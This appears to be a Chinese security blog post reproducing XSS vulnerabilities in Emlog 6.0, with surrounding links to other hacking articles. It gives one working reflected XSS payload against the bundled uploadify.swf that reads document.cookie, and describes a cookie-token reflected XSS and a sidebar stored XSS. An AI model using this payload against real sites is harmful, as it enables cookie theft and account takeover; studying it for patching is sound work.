欢迎来到【血梦博客】 今天是:2022年05月18日 星期三
站长联系QQ:9468395
一、漏洞简介
二、漏洞影响
Emlog 6.0
三、复现过程
Uploadify SWF XSS
Emlog使用了 uploadify.swf 的方式上传文件,文件路径 /include/lib/js/uploadify/uploadify.swf
payload
http://www.0-sec.org/include/lib/js/uploadify/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(document.cookie)}}//&.swf
效果,可无视浏览器filter:
反射xss
此处的XSS主要发生在cookie上,因为某些页面如 admin/admin_log,admin/sort.php,admin/link.php页面需要在表单中添加了hidden属性的token值,而这个token值直接从用户的cookie中取得,导致了一个反射型XSS
拦截抓包修改cookie中的token值如下:
效果:
侧边栏存储性XSS
为了同样是为了支持HTML代码的输出,没有转义对应的脚本代码标签,导致了存储性的XSS存在
- 上一篇:Emlog 6.0 后台暴力破解
- 下一篇:Windows 最新提权教程
猜你还喜欢
- 07-08九年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 03-21黑客如何破解wifi密码
- 01-12批量检测SQL注入
- 最新文章
- 随机文章
-
- Emlog 6.0 xss集合
- Emlog 6.0 后台暴力破解
- Emlog 6.0 数据库备份与导入功能导致后台getshell
- Emlog 越权&后台getshell
- Emlog 相册插件前台SQL注入+Getshell
- 黑客如何破解wifi密码
- HVV应急之Linux入侵排查
- 有黑客正利用Exchange漏洞疯狂发起勒索软件攻击
- D-Link路由器漏洞研究分享
- PHPSTROM远程调试php项目
- Apache OFBiz披露新RCE漏洞,黑客可以接管ERP系统
- 黑灰产情报周报|用户积分代刷衍生的诈骗事件
- 记一次tp5.0.24非法网站渗透
- 内网渗透--对不出网目标的打法
- 内网初体验之环境搭建
- 红队渗透下的tp技巧
- 密码安全那些事儿
- 揭秘全球最危险的11大网络间谍组织
- 内网渗透测试:Kerberos 协议& Kerberos 认证原理
- Linux下内存马进阶植入技术
- 热门文章
-
- 九年专业安全团队承接渗透入侵维护服务
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- Emlog黑客站模板“Milw0rm”发布
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑客怎样简单入侵别人手机,黑客是如何入侵手机的?
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
- 文章标签
-